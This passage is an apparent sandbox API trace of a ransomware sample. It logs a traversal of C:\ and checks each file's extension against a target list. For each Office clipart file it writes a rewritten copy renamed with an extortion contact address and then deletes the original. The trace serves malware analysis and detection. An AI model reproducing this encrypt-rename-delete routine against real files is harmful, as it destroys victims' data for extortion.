(lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0056.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0056.465] lstrlenW (lpString=".doc") returned 4 [0056.465] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.465] lstrlenW (lpString=".docx") returned 5 [0056.465] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.465] lstrlenW (lpString=".pdf") returned 4 [0056.465] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.465] lstrlenW (lpString=".xls") returned 4 [0056.465] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.465] lstrlenW (lpString=".xlsx") returned 5 [0056.465] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.465] lstrlenW (lpString=".ppt") returned 4 [0056.465] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0056.465] lstrlenW (lpString=".zip") returned 4 [0056.465] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.466] lstrlenW (lpString=".rar") returned 4 [0056.466] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.466] lstrlenW (lpString=".bz2") returned 4 [0056.466] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.466] lstrlenW (lpString=".7z") returned 3 [0056.466] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0056.466] lstrlenW (lpString=".dbf") returned 4 [0056.466] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0056.466] lstrlenW (lpString=".1cd") returned 4 [0056.466] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0056.466] lstrlenW (lpString=".jpg") returned 4 [0056.466] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.466] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=6632) returned 1 [0056.466] CloseHandle (hObject=0x218) returned 1 [0056.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf")) returned 0x20 [0056.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0056.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0056.467] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.467] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0056.467] GetLastError () returned 0x0 [0056.467] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x19e8, lpOverlapped=0x0) returned 1 [0056.469] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x19f0, lpOverlapped=0x0) returned 1 [0056.470] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.470] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.470] SetEndOfFile (hFile=0x1bc) returned 1 [0056.470] CloseHandle (hObject=0x1bc) returned 1 [0056.471] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.471] SetEndOfFile (hFile=0x218) returned 1 [0056.471] CloseHandle (hObject=0x218) returned 1 [0056.471] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.472] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf")) returned 1 [0056.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0056.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0056.472] lstrlenW (lpString=".doc") returned 4 [0056.472] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.472] lstrlenW (lpString=".docx") returned 5 [0056.472] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.472] lstrlenW (lpString=".pdf") returned 4 [0056.472] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.472] lstrlenW (lpString=".xls") returned 4 [0056.472] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.472] lstrlenW (lpString=".xlsx") returned 5 [0056.472] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.472] lstrlenW (lpString=".ppt") returned 4 [0056.472] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0056.472] lstrlenW (lpString=".zip") returned 4 [0056.472] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.472] lstrlenW (lpString=".rar") returned 4 [0056.472] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.472] lstrlenW (lpString=".bz2") returned 4 [0056.472] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.473] lstrlenW (lpString=".7z") returned 3 [0056.473] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0056.473] lstrlenW (lpString=".dbf") returned 4 [0056.473] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0056.473] lstrlenW (lpString=".1cd") returned 4 [0056.473] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0056.473] lstrlenW (lpString=".jpg") returned 4 [0056.473] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.474] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.474] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0056.475] GetLastError () returned 0x0 [0056.475] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x83c, lpOverlapped=0x0) returned 1 [0056.477] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x840, lpOverlapped=0x0) returned 1 [0056.479] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.479] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.479] SetEndOfFile (hFile=0x1bc) returned 1 [0056.479] CloseHandle (hObject=0x1bc) returned 1 [0056.479] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.479] SetEndOfFile (hFile=0x218) returned 1 [0056.480] CloseHandle (hObject=0x218) returned 1 [0056.480] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.480] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf")) returned 1 [0056.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0056.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0056.480] lstrlenW (lpString=".doc") returned 4 [0056.480] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.480] lstrlenW (lpString=".docx") returned 5 [0056.480] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.480] lstrlenW (lpString=".pdf") returned 4 [0056.480] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.480] lstrlenW (lpString=".xls") returned 4 [0056.480] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.480] lstrlenW (lpString=".xlsx") returned 5 [0056.481] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.481] lstrlenW (lpString=".ppt") returned 4 [0056.481] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0056.481] lstrlenW (lpString=".zip") returned 4 [0056.481] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.481] lstrlenW (lpString=".rar") returned 4 [0056.481] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.481] lstrlenW (lpString=".bz2") returned 4 [0056.481] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.481] lstrlenW (lpString=".7z") returned 3 [0056.481] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0056.481] lstrlenW (lpString=".dbf") returned 4 [0056.481] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0056.481] lstrlenW (lpString=".1cd") returned 4 [0056.481] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0056.481] lstrlenW (lpString=".jpg") returned 4 [0056.481] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.481] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.482] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0056.482] GetLastError () returned 0x0 [0056.482] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x2418, lpOverlapped=0x0) returned 1 [0056.483] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x2420, lpOverlapped=0x0) returned 1 [0056.484] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.484] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.484] SetEndOfFile (hFile=0x1bc) returned 1 [0056.485] CloseHandle (hObject=0x1bc) returned 1 [0056.485] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.485] SetEndOfFile (hFile=0x218) returned 1 [0056.485] CloseHandle (hObject=0x218) returned 1 [0056.486] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.486] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf")) returned 1 [0056.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0056.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0056.486] lstrlenW (lpString=".doc") returned 4 [0056.486] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.486] lstrlenW (lpString=".docx") returned 5 [0056.486] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.486] lstrlenW (lpString=".pdf") returned 4 [0056.486] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.486] lstrlenW (lpString=".xls") returned 4 [0056.486] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.486] lstrlenW (lpString=".xlsx") returned 5 [0056.486] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.486] lstrlenW (lpString=".ppt") returned 4 [0056.486] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0056.486] lstrlenW (lpString=".zip") returned 4 [0056.486] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.487] lstrlenW (lpString=".rar") returned 4 [0056.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.487] lstrlenW (lpString=".bz2") returned 4 [0056.487] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.487] lstrlenW (lpString=".7z") returned 3 [0056.487] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0056.487] lstrlenW (lpString=".dbf") returned 4 [0056.487] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0056.487] lstrlenW (lpString=".1cd") returned 4 [0056.487] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0056.487] lstrlenW (lpString=".jpg") returned 4 [0056.487] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.487] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.487] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0056.488] GetLastError () returned 0x0 [0056.488] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x928, lpOverlapped=0x0) returned 1 [0056.489] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x930, lpOverlapped=0x0) returned 1 [0056.490] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.490] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.490] SetEndOfFile (hFile=0x1bc) returned 1 [0056.490] CloseHandle (hObject=0x1bc) returned 1 [0056.490] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.490] SetEndOfFile (hFile=0x218) returned 1 [0056.491] CloseHandle (hObject=0x218) returned 1 [0056.491] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.491] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf")) returned 1 [0056.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0056.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0056.492] lstrlenW (lpString=".doc") returned 4 [0056.492] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString=".docx") returned 5 [0056.492] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.492] lstrlenW (lpString=".pdf") returned 4 [0056.492] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString=".xls") returned 4 [0056.492] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.492] lstrlenW (lpString=".xlsx") returned 5 [0056.492] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.492] lstrlenW (lpString=".ppt") returned 4 [0056.492] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0056.492] lstrlenW (lpString=".zip") returned 4 [0056.492] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.492] lstrlenW (lpString=".rar") returned 4 [0056.492] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString=".bz2") returned 4 [0056.492] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString=".7z") returned 3 [0056.492] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0056.492] lstrlenW (lpString=".dbf") returned 4 [0056.492] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0056.492] lstrlenW (lpString=".1cd") returned 4 [0056.492] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0056.493] lstrlenW (lpString=".jpg") returned 4 [0056.493] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.493] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.493] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0056.493] GetLastError () returned 0x0 [0056.493] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x17ac, lpOverlapped=0x0) returned 1 [0056.928] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x17b0, lpOverlapped=0x0) returned 1 [0056.929] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.930] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.930] SetEndOfFile (hFile=0x1bc) returned 1 [0057.152] CloseHandle (hObject=0x1bc) returned 1 [0057.152] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.152] SetEndOfFile (hFile=0x218) returned 1 [0057.153] CloseHandle (hObject=0x218) returned 1 [0057.153] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0057.153] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf")) Thread: id = 14 os_tid = 0x9ac [0033.858] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2e90078 [0033.858] lstrlenW (lpString="C:") returned 2 [0033.858] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x352fd00 | out: lpFindFileData=0x352fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xba8b20 [0033.858] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0033.859] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0033.859] lstrlenW (lpString="$Recycle.Bin") returned 12 [0033.859] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0033.859] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2ea0080 [0033.859] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0033.859] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, 